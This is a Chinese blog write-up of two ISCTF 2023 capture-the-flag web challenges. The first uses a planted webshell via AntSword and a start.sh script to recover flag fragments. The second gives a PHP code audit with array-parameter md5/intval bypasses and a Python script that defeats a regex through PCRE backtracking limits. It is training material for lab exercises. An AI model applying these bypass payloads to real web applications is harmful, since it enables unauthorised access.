当前位置: 首页 > article >正文

23isctf

where_is_the_flag

1.打开环境,上面有一句话木马,直接蚁剑上

flag1:蚁剑连接上就可以直接看见,FLAG1:Yunxi{d0c0

flag2:在根目录下就有   797a-4697-

 

flag3: 在主页面有一个start.sh里面有提示信息  

4dfe-9b48-50ff544c2273}

 start.sh的内容

#!/bin/sh
sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php
echo ${FLAG:10:10} > /flag2
export FLAG3=${FLAG:20}
FLAG3=${FLAG:20}
export FLAG="flag"
FLAG="flag"
httpd -D FOREGROUND

解释如下

sed -i "s/{{FLAG1}}/${FLAG:0:10}/" /var/www/localhost/htdocs/flag.php:这行命令使用sed(流编辑器)来处理/var/www/localhost/htdocs/flag.php文件。-i选项表示直接修改文件。s/{{FLAG1}}/${FLAG:0:10}/是sed的替换命令,它将文件中的{{FLAG1}}替换为环境变量FLAG的前10个字符。

echo ${FLAG:10:10} > /flag2:这行命令使用echo输出FLAG环境变量的第11到第20个字符(因为索引从0开始),并将输出重定向到/flag2文件。

export FLAG3=${FLAG:20}:这行命令将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3环境变量,并使用export命令使其在当前shell及其子进程中可用。

FLAG3=${FLAG:20}:这行命令与上一行类似,也是将FLAG环境变量的第21个字符开始的子字符串赋值给FLAG3变量,但没有使用export,所以这个变量只在当前shell中有效。

export FLAG="flag":这行命令将FLAG环境变量的值设置为字符串"flag",并使用export命令使其在当前shell及其子进程中可用

打开终端,执行命令echo $FLAG3

绕进你的心里

1.代码审计

<?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){   //数组绕过
    echo "md5绕过了!";
    if(preg_match("/[0-9]/", $num)){     //匹配数字
        die('你干嘛?哎哟!');
    }
    elseif(intval($num)){                //匹配字符
        if(preg_match('/.+?ISCTF/is', $str)){
            die("再想想!");
        }
        if(stripos($str, '2023ISCTF') === false){
            die("就差一点点啦!");
        }
        echo $flag;
    }
}
?> 

2.payload:后面两个数组绕过不解释了,解释一下前面的绕过

?zhurong[]=1&hongmeng[]=2&shennong[]=3

第二层,绕过intval()限制,数字绕过

intval() 转换数组类型时,不关心数组中的内容,只判断数组中有没有元素。

    「空数组」返回 0
    「非空数组」返回 1

3.intval()限制字符绕过

第三层的绕过关键在pan_gu利用正则最大回溯绕过,看到'/.+?ISCTF/is'这种就要想到了,我们通过发送超长字符串的方式,使正则执行失败,最后绕过目标对PHP语言的限制。

网上找的通用回溯poc如下,需要对应不同题目改脚本:

import requests

url = "http://172.16.17.201:50125/?zhurong[]=1&hongmeng[]=2&shennong[]=3"

data = {

    'pan_gu': 'aaaaaaaaaa' * 250000 + '2023ISCTF'

}

r = requests.post(url, data=data)

print(r.text)


http://www.kler.cn/a/384754.html

相关文章:

  • GPU 环境搭建指南:如何在裸机、Docker、K8s 等环境中使用 GPU
  • A day a tweet(sixteen)——The better way of search of ChatGPT
  • 基于Spring Boot的船舶监造系统的设计与实现,LW+源码+讲解
  • Vue2 doc、excel、pdf、ppt、txt、图片以及视频等在线预览
  • Spark本地模式安装
  • 这款神器,运维绝杀 !!!
  • tomcat 开启远程debug模式
  • vue组件获取props中的数据并绑定到form表单 el-form-item的v-model中方法
  • Django-------重写User模型
  • PymuPDF4llm提取pdf文件文字、表格与图片
  • 弱口令攻击的实现原理及预防
  • qt QFileSystemModel详解
  • 使用Docker-Compose安装redis,rabbitmq,nacos,mysql,nginx,tomcat,portainer组件教程
  • 阿里云多端低代码开发平台魔笔使用测评
  • 信创背景下的GIS技术创新突破方向
  • 05LangChain实战课 - 提示工程与FewShotPromptTemplate的应用
  • 大厂面试真题-如果使用guava limiter实现实例级别的缓存
  • 关于我、重生到500年前凭借C语言改变世界科技vlog.16——万字详解指针概念及技巧
  • 【深度学习滑坡制图|论文解读2】基于融合CNN-Transformer网络和深度迁移学习的遥感影像滑坡制图方法
  • 每天一个git命令
  • windows XP,ReactOS系统3.4 共享映射区(Section)---1
  • comfyUI官方笔记整理
  • 第一个纯血鸿蒙应用(Napi开发-ArtTS调用C/C++)
  • 【HarmonyOS】PixelMap转化为Uri
  • 2024.11.4 STM32点灯和简单的数据收发
  • adb shell常用命令